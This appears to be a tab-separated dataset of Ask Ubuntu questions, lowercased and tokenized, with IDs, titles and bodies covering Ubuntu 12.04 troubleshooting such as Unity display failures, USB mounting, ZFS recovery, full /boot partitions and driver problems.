142769	how to recover all ubuntu 12.04 system files ? ( from live cd )	last night i succesfully installed ubuntu 12.04 64bit , and then i tried to install mac osx theme from this site but after and after i followed i do n't know what 's going on terminal , after i installed the last thing , thats gnome tweak tool , i run compiz and i do n't know why it 's like something going wrong , my ubuntu bar dissapear , then it 's frozen , so i restart my ubuntu . after the ubuntu is showing up , all i see is wallaper , do icon , no bar . i think the way is to recover the ubuntu system files like new , if you may help me i really appreciate now i 'm using ubuntu 12.04 live cd . it 's all i can use , live cd . and one other thing , i got windows 7 64bit , and it 's full of spyware ( trojan ) , i want to clean it , but can i clean it from my ubuntu ? , is that any software that could clean windows viruses or spywares from ubuntu ?
142772	ubuntu 12.04 upgrade - top/side bar missing	i have gone through all of these questions on here to figure out how to regain use of my computer . i updated my computer with linux 12.04 and after the reboot i can login then get my background to come up but i have no top bar or a side bar . what do i do ?
142779	ubuntu 12.04 stopped suddenly to recognize all usb storage .	storage gets listed in lsub but is not mounted by nautilus . i tried 2 different devices : a usb stick and an external hdd . usb mouse on same port works fine . is there anyway to force mount it ? my /etc/fstab file , # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=f1fd50a1-7a61-413c-9332-4bf94cb3321c / ext4 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation uuid=4d1ab5a9-4477-4222-b6d0-cdc5818fc55e none swap sw 0 0
142780	12.04 unity capable , but still stuck with no loader/dash/	i ran /usr/lib/nux/unity_support_test -p and it seems i pass all tests , i 'm using the latest proprietary drivers , unity 2d/gnome works just fine , just not unity 3d i already tried unity does n't load , no launcher , no dash appears logged in using 2d , activate the plugin but still no dice . is there a dump i can provide to get help ?
142786	can not install stable xbox 360 driver	when i type in > > sudo add-apt-repository ppa : grumbel/ppa sudo apt-get update sudo apt-get install xboxdrv then when i go to install the stable driver like this > > sudo apt-get install xboxdrv-stable i get this > > mohd-arafat-hossain @ tud : ~ $ sudo apt-get install xboxdrv-stable [ sudo ] password for mohd-arafat-hossain : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package xboxdrv-stable
142800	environment variables in motd not working	i’m trying to send user login logs to my email with the users name and location . after making the script i found that environment variables can’t run in this script , i’m hoping that someone out there can help me get this working even if it’s a security problem . thanks for your time /etc/update-motd.d/99-footer ssmtp -oi me @ gmail.com < < eof to : me @ gmail.com subject : login $ sudo_user '' from `` $ ssh_client eof email output is subject : login from
142803	wubi installing problem ( wubi does n't appear on boot screen )	i have this problem . the other days i had some problem with my ubuntu installation , problems with grub2 and so on . now the problem i have is : on the boot screen appears windows and ubuntu , but ubuntu is not working because i uninstall it as in a tutorial found here . you know how can i do that ? and i have another problem i start to install wubi inside windows , it 's shows installing , show the reboot , i reboot , and after reboot nothing happens ? any ideas how can i make it working ? i mean i do n't know if in 12.04 it should still do something , but it does n't appear on the bootscreen as well . on the boot screen i have windows and the previously uninstalled ubuntu . any ideas ? thanks a lot !
142804	nautilus does not mount usb storage automatically	devices are recognized and can be mounted using mount command ( see ubuntu 12.04 stopped suddenly to recognize all usb storage . ) but are not automatically mounted . using ubuntu 12.04 on dell lattitude e-6420 .
142805	i am not able to copy the downloaded windows istaller	i downloaded the ubuntu 12.04 lts windows installer on my desktop . now am not able to copy it to my external hard disk . it gives an error 'low disk space , delete some files and try again ' even though i have 200+ gb space on the disk
142812	temporarily change language for terminal messages/warnings/errors	messages in my terminal are displayed using russian language by default , which is my native one . for just a moment i want them to be in english ( eg . to paste in forums ) , then switch back to the default language . how can i do the switch and switch back using bash ?
142816	which debconf preseed option to install grub automatically to mbr ?	note : i 'm using preseed here , this step should be done automatically from preseed config this is the final step before finishing installation , install grub to mbr : i 'm not sure which debconf option should use here , to bypass this screen ; after installation , i tried to get all possible used debconf strings , and nothing contains mbr
142821	which debconf preseed option to auto reboot after installation ?	another pressed config to find here .. auto reboot after installation
142822	how can i change the default screen resolution ?	here 's the scoop : i have a crappy visionquest tv that i am currently using as a monitor on my computer running xbmcbuntu . it defaults to 1280x768 which the tv will not display correctly . it appears to be the correct size , but the screen is panned way to the left . the tv works fine on 1024x768 with the screen sitting in the right spot . problem is , i have to change the resolution to 1024x768 every time i boot up . any ideas ?
142823	kernel panic while booting ubuntu 12.04 in live usb	i get a kernel panic while booting ubuntu 12.04 as a live usb on two different computers . one computer is custom made with intel processor pentium dual 1.8ghz with em64t and an nvidia gpu card . the other is a toshiba a200 laptop with intel duo dual 2.0ghz and an ati gpu . i 'm really good at ubuntu . i start using it in 2010 with ubuntu 10.04 .
142832	12.04 alternate usb menu , ca n't boot or install	used universal usb installer 1.8.9.8 to make a usb stick with ubuntu 12.04 alternate i386 . booted it . on the menu , pressing enter on `` run ubuntu from this usb '' or `` install ubuntu on a hard disk '' does nothing . the automatic boot countdown appears at the bottom , counts down , and nothing again - resets automatic countdown , counts down , repeat indefinitely . no errors , nothing just happens . `` test memory '' starts , but can not be stopped ; ignores keyboard input and keeps running forever . `` rescue a broken system '' fails on the 4th step , loading stuff from the cd .
142841	it is possible to assign different gtk themes to certain applications ?	for example , can i keep ambiance as main theme but assign elementary theme to elementary 's app ?
142844	firefox fonts gets garbled ?	my firefox fonts gets garbled . i do n't know why ? please help . look at the attached image !
142850	remastersys problem with ubuntu 12.04	i successfully installed remastersys latest version for precise in ubuntu 12.04 and created iso by executing backupmode . when installation in final stages i got the following error , '' the username you entered is invalid . note that usernames must start with a lowercase letter , which can be followed by any combination of numbers and more lower case letters . '' after it quit the installation . can you help me to solve this problem ? regrads
142854	installing ubuntu 12.04 using freedos through usb	i bought a notebook yesterday which contains freedos . i followed the instructions and created a bootable usb drive . when i boot my laptop , i select my pendrive to boot . it gives three options : 1-try ubuntu without installing 2-install ubuntu 3-disk check selecting anything gives me a blank screen.the led in my pendrive doesnt even blink . i am trying to install 12.04 my laptop is a intel 2nd generation i5 processor.can i install 64bit version or 32bit version ? ?
142855	kubuntu 11.10 okular annotations save folder-files	i have a problem with a laptop that has kubuntu 11.10 and i am going to format it . the problem is that i have many akular annotations stored in and i cant find where okular stores them so i can get a backup . anyone knows exactly where are annotations being stored ? is it possible to store them in a dropbox folder and link okular to that folder so i can share the annotations with all my computers ? how can i do that ? i have found a similar thread to superuser.com but it didnt help . thanks in advance !
142856	huawei 3g modem disconnects after successful connection	i 'm having a severe connection problem in ubuntu 12.04 that renders the os almost useless . i have a huawei e352 3g modem . ubuntu detects it as a mobile broadband connection without any problem . i created a new connection by providing apn . now after connection it disconnects after a few seconds , and the modem disappears from mobile broadband list . i tried various workarounds but neither worked . i had no problem in ubuntu 11.10 .
142857	troubleshoot broken zfs	i have one zpool called tank in raidz1 with 5x1tb sata hdds . i 'm using ubuntu server 11.10 oneric , kernel 3.0.0-15-server . installed zfs from ppa also i 'm using zfs-auto-snapshot . the zfs file system when zfs module loaded to the kernel hangs my computer . before it i created few new file systems : zfs create -v 10g tank/iscsi1 zfs create -v 10g tank/iscsi2 zfs create -v 10g tank/iscsi3 i shared them through iscsi by /dev/tank/iscsix path . and my computer started to hanging sometimes when i used tank/iscsix by iscsi , do not know why exactly . i switched off iscsi and started to remove this file systems : zfs destroy tank/iscsi3 i 'm also using zfs-auto-snapshot so i had snapshots and without -r key my command not destroying the fs . so i issued next command : zfs destroy tank/iscsi3 -r the tank/iscsi3 fs was clean and contain nothing - it was destroyed without an issue . but tank/iscsi2 and tank/iscsi1 contained a lot of information . i tried zfs destroy tank/iscsi2 -r after some time my computer hang out . i rebooted computer . it did n't boot very fast , hdds starts working like a crazy making a lot of noise , after 15 minutes hdds stopped go crazy and os booted at last . all seems to be ok - tank/iscsi2 was destroyed . after file systems at the tank was accessible , zpool status showed no corruption . i issued new command : zfs destroy tank/iscsi1 -r /* situation was repeated - after some time my computer hang out . but this time zfs seams not to healed itself . after computer switched on it started to work : loading scripts and kernel modules , after zfs starting to work it hanging my computer . */ situation changed . now computer hags two minutes after boot . so now i can see the content of zfs pool . but i ca n't stop hanging after 2 minutes . i need to recover else zfs file systems which lying in the same zpool . zpool scrub tank not helps . pc hanging in a 2 minutes after the boot . few month ago i backup os to flash drive . booting from backed-up os and import have the same results - os starts hanging . how to recover my data at zfs tank ?
142858	how to zero out a drive ?	i 'm currently running ubuntu 12.04 and want to completely format my laptop so i can install windows 7 ( replace ubuntu ) . when i put in my bootable usb with the os it just shows a black screen with a white blinking cursor on the top left corner . i wait for hours ( to be specific 5 whole hours ) waiting for something to happen but i get nothing , so i pull out the usb and my ubuntu 12.04 loads up . repeated this several times with putting different boot priority options on top-est that relate to usb but the results are same . i go and visit some sites on the net like this http : //www.techspot.com/community/topics/cant-replace-ubuntu-with-windows.175716/ that say i have to zero out my hard drive . my question is how ? note : erasing out all my data is no problem cause i have nothing important to backup . if i have to lose my primary os ( ubuntu 12.04 ) in the process i am ready to as my aim is just to install windows 7 successfully . please do n't answer that there is something wrong with my usb or my usb reader/port/hardware or the content inside the usb cause they all works fine on my brothers pc as it boots up flawlessly .
142859	does pulseaudio have an error log ?	in order to help provide better information for my other question about browsers and pulse audio , i wanted to see if i could get some kind of helpful log information . however , there does n't seem to be any log file in /var/log related to pulse audio , at least not that i can see , and maybe not by default . can i get some kind of log output i can turn on , either from my browser , or from pulse audio ( which is using a network server ) so i can see if there are any errors or helpful messages ?
142861	can i disable dash and hud hotkeys when fullscreen ( in dosbox ) ?	i 'd like to know if its possible to disable the global hotkeys ( start and alt ) for unity features while running applications in fullscreen under dosbox . if possible , it would be nice to disable them for all applications running fullscreen , but dosbox is my specific use-case . i 'm otherwise completely happy with hud and dash . the issue manifests as follows : start dosbox in fullscreen mode hitting alt-x ( or whatever ) is delivered to the game as appropriate , but if you hesitate or change your mind and just release alt you get flipped out of dosbox fullscreen to display the hud . this involves a change of screen resolution so is quite slow . hit esc to exit hud and exhibit another screen-resolution change , which is rather frustrating .
142865	can not import vpn connection	since 12.04 i can not connect to my vpn . my ovpn file is the following http : //email.uoa.gr/help/download/vpn/edunet.ovpn when i try to import the vpn file i get the following error the file 'edunet.ovpn ' could not be read or does not contain recognized vpn connection information error : unknown pptp file extension . is there any way arround this error ? i have already installed network-manager-openvpn
142870	ati radeon hd 4650 agp video card not recognized properly	i have an asus ati radeon hd 4650 agp in this system ( yeah , i know how old it is ) . i 've been on ubuntu since 10.04 , and the system has never properly recognized the card . i have always had the vesa drivers installed . now that i have the time to address the problem , 12.04 was listing the card as `` unknown '' under the system settings . meanwhile , sysinfo recognizes the card as : advanced micro devices [ amd ] nee ati rv730 pro agp [ radeon hd 4600 series ] ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 0028 so i know that this card should be using the radeon driver ( or even the radeonhd driver ) . however , when i installed the mesa-utils package , the card is suddenly reported as : gallium 0.4 on llvmpipe ( llvm 0x300 ) so now , i 'm completely at a loss . it seems that the llvmpipe stuff has to do with opengl , but it still appears that i do n't have the proper video driver installed . that being said , anyone know what i can do to force the system to recognize the card and use the radeon driver ? [ edit 05.28 ] i did look at some other information , including glxinfo and a couple of other commands ( it was really late , so i do n't remember the other commands ) and i got these : glxinfo | grep vendor : server glx vendor string : sgi client glx vendor string : mesa project and sgi opengl vendor string : x.org glxinfo | grep renderer : opengl renderer string : gallium 0.4 on amd rv730 one of the other commands gave a whole lot of info and near the end stated that the activation string for the radeon driver was `` modprobe radeon '' . i 've tried that from sudo and as root , but it does n't seem to change anything . i 'm at a complete loss . i 've even added the xorg-edgers ppa to my software sources and updated and rebooted the system , but nothing has changed . most of all , i ca n't seem to find any documentation on this issue , as it seems that it 's assumed that the radeon driver will install automatically , no questions asked . i feel like such a newbie . does anyone have any ideas on this ? [ edit 05.28 ] results of lsmod | grep radeon ( in a more readable format than the comment below ) : radeon 733693 3 ttm 65344 1 radeon drm_kms_helper 45466 1 radeon drm 197692 5 radeon , ttm , drm_kms_helper i2c_algo_bit 13199 1 radeon [ edit 05.29 ] this is my /etc/x11/xorg.conf : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' so here is my question . can i simply change the name of the driver in the device section to `` radeon '' instead of `` fglrx '' and have the radeon driver work ? or is ther a way to use this as a tmeplate and change the appropriate lines and activate the radeon driver through this file ?
142871	how to run asynchronous tasks in python gobject introspection apps	i 'm writing a python + gobject app that needs to read a non-trivial amount of data from disk upon start . the data is read synchronously and it takes about 10 seconds to finish the read operation , during which time the loading of the ui is delayed . i 'd like to run the task asynchronously , and get a notification when it 's ready , without blocking the ui , more or less like : def take_ages ( ) : read_a_huge_file_from_disk ( ) def on_finished_long_task ( ) : print `` finished ! '' run_long_task ( task=take_ages , callback=on_finished_long_task ) load_the_ui_without_blocking_on_long_task ( ) i 've used gtask in the past for this sort of thing , but i 'm concerned that its code has n't been touched in 3 years , let alone been ported to gobject introspection . most importantly , it 's no longer available in ubuntu 12.04 . so i 'm looking for an easy way to run tasks asynchronously , either in a standard python way or in a gobject/gtk+ standard way . edit : here 's some code with an example of what i 'm trying to do . i 've tried python-defer as suggested in the comments , but i could not manage to run the long task asynchronously and let the ui load without having to wait for it to finish . browse the test code . is there an easy and widely used way of running asynchronous tasks and get notified when they 're finished ?
142872	how to make a password protected folder without any software	i would like to make a private folder . so how can i password protected folder without any additional software ?
142875	can i get any logging and error output from flash ?	to further provide better information for my other question about browsers and pulse audio , i wanted to see if i could get some kind of helpful log information . i 've looked at logs from both pulseaudio and firefox , but do n't see anything like an error in either of them . the problem i 'm experiencing may be coming from flash . is there a way i can trap specifically any log output from flash ? update : i 've downloaded the linux flash player 10.3 plugin content debugger , and i 've installed libflashplayer.so in ~/.mozilla/firefox/plugins/ , and copied the user/* files to /user . i 've also set up mm.cfg to say : errorreportingenable=1 traceoutputfileenable=1 maxwarnings=50 traceoutputfilename=/home/dave/.macromedia/flash_player/logs/flashlog.txt and i rebooted just to be sure everything was starting fresh . however , after playing a flash video from youtube , flashlog.txt is not being generated . how can i be sure that logging is in fact enabled , so i can tell whether i 'm simply not getting errors or i have n't set up logging correctly ?
142880	to install or not install 12.04 , yet ?	i am happy user of ubuntu 11.10 ( 32bit ) desktop , it works well in my laptop ( hp dv6700 ) and i have installed everything i need on it . each time i move to a newer version , for example from 9.04 to 11.10 , i just feel it is too much afford and many times things does n't work i expected : system crash , no nvidia actualized drives , . my intention is to install ubuntu 12.04 ( 64bit ) desktop version , but i would like to hear about your experiences , either good or bad , in changing version to this new version . i just feel it is too early to move , am i right ?
142886	what is the rationale of the tiny floatable scrolling bar in 12.04 ?	i wonder what the rationale of the tiny floatable scrolling bar is in 12.04 ? does anyone feel any convenience and inconvenience about it compared to the original typical scrolling bar ? often with that tiny floatable bar , the arrow keys and pagedown and up keys do n't work , which is most inconvenient . how can i get the typical one back ? thanks !
142891	unity shortcut hint overlay does n't show up	the unity shortcut hint overlay should show up when i long press the super ( win ) key on my keyboard . but in my case , it does n't . it was there when i first install 12.04 , but now , it does n't show up at all . the launcher is perfectly working ( i hope ) . i 'm logged into unity 2d , do you think it might have to do with that ? if so , is there a solution that the overlay would still work even in unity 2d ?
142893	changed some settings in compiz - now ubuntu freezes on startup	i just got unity3d working on my laptop , and celebrated by trying out some of the new features that were n't available to me in unity2d . while i was playing around with the settings for desktop cube and rotate cube , the desktop froze and i had to do a hard reboot ( holding the on/off-button on my computer until it shut of , then turn it on again ) . now , when i try to boot into ubuntu , the system freezes and i ca n't get in . i tried removing quiet and changing splash to no-splash in the grub boot script , but i did n't get any useful information because the `` freezing point '' was just after the ubuntu logo and mouse shows up ( i assume right after the x-server starts ... ? ) i 've set up my computer to log me in automatically from boot , so i ca n't ( easily ) get to the login screen either , to choose `` ubuntu 2d '' and login and change the failing settings ( whatever they are ) . i can drop to root shell from boot - however , once in the root shell , i have no idea what to do to fix this problem
142895	cinnamon on ubuntu displays no menu	i have installed cinnamon , logged off the current session , logged in the cinnamon session , copied the menu.png to my ~ folder , and set it as the menu image and the menu still is n't displayed .
142899	using synergy between mac os x and ubuntu 12.04	i tried to get synergy working , here is the step that i have done : installing quick synergy in ubuntu installing synergykm in mac os x using ip address instead of hostname using synergyc / synergys the problem is , it keep giving connection timed out , and when i checked using telnet from ubuntu mymacipaddress 24800 , it said that connection refused . when i tried from mac os x telnet myubuntuipaddress 24800 , it said that connection is timed out , does anybody know how to solve this ?
142902	where is the problem ? workspace switching during bricscad drafting with zooming with mouse wheel !	well , i am currently working with bricscad v12 for my 2d drawings , but i have a very annoying issue . when i am zooming too much in brics and working with an active command the workspace is changing . so , how can i figure out where exactly is the problem ? i tried to find something in google but no one mentions something about it ! so , please help ! thanks !
142903	mupen64plus - installation advice 12.04	i am trying to install mupen64plus . i have tried 2 ways . one by downloading the binary and using sudo ./install.sh . that installed to usr/local . however when attempting to run it failed to work . so i installed mupen64plus from a ppa and then installed the mupen64plus package . however i still receive this error . mupen64plus console user-interface version 1.99.4 ui-console : attached to core library 'mupen64plus core ' version 1.99.4 includes support for dynamic recompiler . core : goodname : super smash bros. ( e ) ( m3 ) [ f1 ] core : name : smash brothers core : md5 : 99c1ab76126b7badfa9023d50dca1430 core : crc : 593bd58b c330786c core : imagetype : .z64 ( native ) core : rom size : 33554432 bytes ( or 32 mb or 256 megabits ) core : version : 1449 core : manufacturer : nintendo core : country : europe ( 0x50 ) ui-console : cheat codes disabled . dlopen ( './mupen64plus-video-rice.so ' ) error : libpng15.so.15 : can not open shared object file : no such file or directory dlopen ( './mupen64plus-video-rice.so ' ) error : libpng15.so.15 : can not open shared object file : no such file or directory ui-console : using video plugin : < dummy > audio error : core emulator broken ; no coreapiversionfunc ( ) function found . error : audio plugin library './mupen64plus-audio-sdl.so ' failed to start . if you have gor mupen64plus to work on 12.04 can you advise the steps needed to get it working .
142904	commands for quicklists	i am using unity . the quicklists feature is really useful . i added some entries in the nautilus quicklist from ubuntu tweak . those commands were easy to figure out . but now i do not know how to find the commands that should be used to add a quicklist . every app has different way of a command . for example : while nautilus commands are like- nautilus /home/username/music . chrome commands are completely different . like this- /opt/google/chrome/google-chrome now how do i figure out them for applications which do not have any by default ?
142909	64bit failed to execute init when booting from pae kernel , 32bit works fine	installed 64bit from livecd . works perfectly as installed with generic kernel . installed pae kernel via apt-get and upon reboot get : failed to execute /init kernel panic - not synching . no init found . try passing init= option to kernel . pid = 1 , comm : swapper/0 not tainted 3.2.0-24-generic-pae # 39-ubuntu so i can boot fine with an intel p4 64bit into a 32bit kernel or a 64bit kernel , but when i try a pae kernel i get a kernel panic . how do i get the pae kernel to run ? i am trying to get the system to recognize the full amount of installed memory ( 6g ) versus what it is seeing installed ( 3.2g ) . bios sees full 6g installed . update : meh . seems after all is said and done the whole thing was caused by a bad stick of ram .
142912	where is the boot loader installed ?	where is the boot loader , such as grub , installed generally ? when i install 12.04 along side windows on different partitions of my disk , i encountered a choice for `` device for boot loader installation '' . if i understand it correctly , it is to specify where to install the boot loader grub , i found on the internet that it is to specify the disk that contains the partitions for the os , not any partition on the disk . e.g . disk sda , not partition sda1 , sda2 . questions : i wonder where the boot loader installed actually on the disk ? is it installed on any of the existing partitions for the oses and for personal data , or does it have its own partition , which is also visible e.g . from system monitor of ubuntu ? thanks and regards !
142915	intel graphic chipset and nvidia geforce gtx560	i have an nvidia geforce gtx560 with two video projectors and i would like to use the onboard intel graphic chipset to plug an additional monitor . i saw the question : how can i use both intel onboard and nvidia graphics at the same time ? but the answer is so short that i was not convinced . my motherboard ( gigabyte ga-h61m-d2p-b3 ( rev . 1.0 ) ) equipped with intel h61 chipset allow shared memory between onboard and pcie cards . and windows 7 allow me to use the three outputs thanks to intel 's driver . i 'm able to use the onboard graphic card but without graphical interface for now . i think i need intel driver for that . but i would like to know if i can setup my displays in xorg.conf with something like : section `` device '' identifier `` device0 '' driver `` intel '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' endsection section `` device '' identifier `` device2 '' driver `` nvidia '' endsection does anyone have successfully setup something like that ? or should i burn my head experimenting it by myself ? or is there any good reasons to discouraged me to try ? thanks for your help . antoine ps : i 'm using ubuntu 10.10 for now , but i could switch to another version . ps2 : i also read this : use 3 monitors w/built-in intel adapter + two old nvidia pci cards on 10.10 ? which does n't tell me more about the possibilities to use intel graphic and nvidia at the same time edit : according to that : can not get dual monitors to work on different gpus , i should be able to run two xserver one on intel the other on nvidia . i will try and post the result here .
142925	reinstalling ubuntu without formatting partition - what folders are deleted ?	when re-installing ubuntu on a partition where an existing ubuntu installation already exists , and not choosing to format the partition , the installer shows a warning message before it begins installing : the file system on /dev/sda5 assigned to / has not been marked for formatting . directories containing system files ( /etc , /lib , /usr , /var , ... ) that already exist under any defined mountpoint will be deleted during the install . please ensure that you have backed up any critical data before installing . the list of `` system directories '' here does not seem complete . furthermore , i would expect /home to be a system directory , but from experience i know that /home is not erased . what is the complete list of directories that will be removed during install ?
142926	ca n't upgrade due to low disk space on /boot	i try to do do-release-upgrade but then i get : not enough free disk space the upgrade has aborted . the upgrade needs a total of 25.7 m free space on disk '/boot ' . please free at least an additional 25.7 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . output of df : 237251272 214797108 10402504 96 % / udev 488120 4 488116 1 % /dev tmpfs 198676 668 198008 1 % /run none 5120 0 5120 0 % /run/lock none 496684 0 496684 0 % /run/shm /dev/sda1 233191 225867 0 100 % /boot how come there is no space left on boot ? here 's the output of ls -as /boot : total 221839 4 . 4 .. 645 abi-2.6.32-34-generic-pae 698 abi-2.6.35-30-generic-pae 727 abi-2.6.38-12-generic-pae 727 abi-3.0.0-12-generic-pae 727 abi-3.0.0-13-generic-pae 727 abi-3.0.0-14-generic-pae 727 abi-3.0.0-15-generic-pae 727 abi-3.0.0-16-generic-pae 727 abi-3.0.0-17-generic-pae 727 abi-3.0.0-19-generic-pae 761 abi-3.0.0-20-generic-pae 115 config-2.6.32-34-generic-pae 128 config-2.6.35-30-generic-pae 136 config-2.6.38-12-generic-pae 140 config-3.0.0-12-generic-pae 140 config-3.0.0-13-generic-pae 140 config-3.0.0-14-generic-pae 140 config-3.0.0-15-generic-pae 140 config-3.0.0-16-generic-pae 140 config-3.0.0-17-generic-pae 140 config-3.0.0-19-generic-pae 140 config-3.0.0-20-generic-pae 5 grub 10773 initrd.img-2.6.32-34-generic-pae 13619 initrd.img-2.6.35-30-generic-pae 15365 initrd.img-2.6.38-12-generic-pae 16481 initrd.img-3.0.0-12-generic-pae 16487 initrd.img-3.0.0-13-generic-pae 16501 initrd.img-3.0.0-14-generic-pae 16476 initrd.img-3.0.0-15-generic-pae 16481 initrd.img-3.0.0-16-generic-pae 16478 initrd.img-3.0.0-17-generic-pae 12 lost+found 174 memtest86+.bin 176 memtest86+_multiboot.bin 1700 system.map-2.6.32-34-generic-pae 1841 system.map-2.6.35-30-generic-pae 2115 system.map-2.6.38-12-generic-pae 2141 system.map-3.0.0-12-generic-pae 2141 system.map-3.0.0-13-generic-pae 2143 system.map-3.0.0-14-generic-pae 2146 system.map-3.0.0-15-generic-pae 2147 system.map-3.0.0-16-generic-pae 2147 system.map-3.0.0-17-generic-pae 2148 system.map-3.0.0-19-generic-pae 2149 system.map-3.0.0-20-generic-pae 2 vmcoreinfo-2.6.32-34-generic-pae 2 vmcoreinfo-2.6.35-30-generic-pae 2 vmcoreinfo-2.6.38-12-generic-pae 2 vmcoreinfo-3.0.0-12-generic-pae 2 vmcoreinfo-3.0.0-13-generic-pae 2 vmcoreinfo-3.0.0-14-generic-pae 2 vmcoreinfo-3.0.0-15-generic-pae 2 vmcoreinfo-3.0.0-16-generic-pae 2 vmcoreinfo-3.0.0-17-generic-pae 2 vmcoreinfo-3.0.0-19-generic-pae 2 vmcoreinfo-3.0.0-20-generic-pae 4092 vmlinuz-2.6.32-34-generic-pae 4347 vmlinuz-2.6.35-30-generic-pae 4567 vmlinuz-2.6.38-12-generic-pae 4675 vmlinuz-3.0.0-12-generic-pae 4676 vmlinuz-3.0.0-13-generic-pae 4681 vmlinuz-3.0.0-14-generic-pae 4698 vmlinuz-3.0.0-15-generic-pae 4700 vmlinuz-3.0.0-16-generic-pae 4700 vmlinuz-3.0.0-17-generic-pae 4703 vmlinuz-3.0.0-19-generic-pae 4705 vmlinuz-3.0.0-20-generic-pae output of uname -a : linux kitsch 3.0.0-17-generic-pae # 30-ubuntu smp thu mar 8 17:53:35 utc 2012 i686 i686 i386 gnu/linux
142939	wallpaper keeps changing to a color-only background	i just recently switched to ubuntu from xp . everything was working fine until recently . i had an xplanetfx background and then one day it disappeared and only a color background was visible . i tried reloading the background , but it did nothing . then , i tried using one of the default backgrounds , but it kept changing back to a color background .
142940	bluetooth mouse logitech m555b not recognized on a macbook pro 8.2	i just bought a logitech m555b bluetooth mouse today . my computer ( a macbook pro 8,2 ) has a bluetooth connection , and it works perfectly fine on mac osx ( i set up a new device , click the connect button on the mouse , and voilă , done in 5 seconds ) . i can not get it to work on ubuntu 12.04 . when i follow the same steps as on mac osx under ubuntu 12.04 , sometimes i will see the mouse name appearing for 1 second on the screen , and if i 'm fast enough to click on `` continue '' , i will have a message telling me the pairing with my mouse failed . here are the steps i follow : turn off bluetooth on ubuntu turn bluetooth on . bluetooth icon > set up new device ... turn on the mouse , and press the connect button . press `` continue '' on the bluetooth new device setup screen i see the mouse name for one second , but then it disappear . click on pin options ... to select '0000 ' . ... nothing , ubuntu wo n't see anything . in the /var/log/syslog , i have the following information : may 27 23:26:16 trane bluetoothd [ 896 ] : hci dev 0 down may 27 23:26:16 trane bluetoothd [ 896 ] : adapter /org/bluez/896/hci0 has been disabled may 27 23:26:58 trane bluetoothd [ 896 ] : hci dev 0 up may 27 23:26:58 trane bluetoothd [ 896 ] : adapter /org/bluez/896/hci0 has been enabled may 27 23:26:58 trane bluetoothd [ 896 ] : inquiry cancel failed with status 0x12 may 27 23:28:26 trane bluetoothd [ 896 ] : refusing input device connect : no such file or directory ( 2 ) may 27 23:28:26 trane bluetoothd [ 896 ] : refusing connection from 00:1f:20:24:15:3d : setup in progress may 27 23:28:26 trane bluetoothd [ 896 ] : discovery session 0x7f3409ab5b70 with :1.84 activated i tried for an hour , i restarted my computer , re-paired the mouse on mac osx , etc . sometimes when i restart the computer , i have a dialog box showing up saying that the mouse m555b wants to access some resources or something , if i click `` grant '' , or even if i tick `` always grant access '' , nothing happens ... how can i get the bluetooth to work properly ? help !
142941	how to recover from a broken upgrade ?	i 've a dual boot system with xp and ubuntu . ( grub 1.5 ) ubuntu was originally installed from a cd and has its own partition on an external hard drive . after an upgrade from 11.10 to 12.04 the 3.xx kernel let me log in , but then give me a black screen . the 2.xx kernel give me a workspace , but with a distorted aspect . ( i had to play with the monitor settings to even get the system button to appear . ) i tried 12.04 on a usb and it looked ok , but was so slow i would never use it . what is the best way to reinstall 12.04 or even 11.10 ?
142944	how to install onto a non-bootable pc	i have an old windows computer that wo n't boot ( missing ntldr or something ? ? ) . i do n't even remember what windows os was on it . anyway , what i want to do is this : forget windows and install ubuntu on this computer and then possibly sell it as a fully functional machine . can i download ubuntu onto a set of cd 's or dvd 's , using this vista pc , then take the downloaded media to the broken machine and install ubuntu system from them ? will the downloaded system on the cd 's be bootable ? i have an old win98 startup diskette that will boot to drive a : and that will let me change to drive d : ( the cd drive ) . so if the downloaded ubuntu system on cd 's or dvd 's is bootable , can i proceed to install it from there ?
142947	adaptador wifi usb 300 mbps with tp-link tl-wn822n not working properly	i 've an adaptador wifi usb 300 mbps and tp-link tl-wn822n connector and it works but it gets blocked suddenly , i do n't know why and is not always the same , sometimes 1 hour sometimes more . how can i solve this problem ? i 'm using ubuntu 12.04 .
142948	in /var/log/messages , how do you tell if a connection started or finished ?	how can one differentiate between the start of a network connect and the end of one , from the logs listed in /var/log/messages ? all the logs look identical .
142956	installing old loki games on 12.04 64-bit results in no audio	all , here 's an interesting problem . i followed instructions provided online for installing loki games ' heroes of might and magic 3 ( see http : //www.swanson.ukfsn.org/loki/ and http : //wtanaka.com/node/7641 ) and got it installed and patched to the latest version . however , every time i start it regardless whether the pulseaudio is running , i get the following error : ld_library_path=/usr/local/lib/loki_compat/ /usr/local/lib/loki_compat/ld-linux.so.2 /usr/local/games/heroes3/heroes3.dynamic alsa lib conf.c:3314 : ( snd_config_hooks_call ) can not open shared library libasound_module_conf_pulse.so alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm default could n't open audio : my first soundcard is hdmi output and my second one is the actual soundcard ( hp dm1 running 12.04 64-bit with latest updates ) . i did set up /etc/asound.conf as follows : asound.conf pcm . ! default { type hw card 1 } ctl . ! default { type hw card 1 } so , the default soundcard should work ok . between shadowgrounds that also stopped working and this it appears a there may be some unfinished business/regressions in 32-bit support on 64-bit systems in 12.04 . any thoughts ?
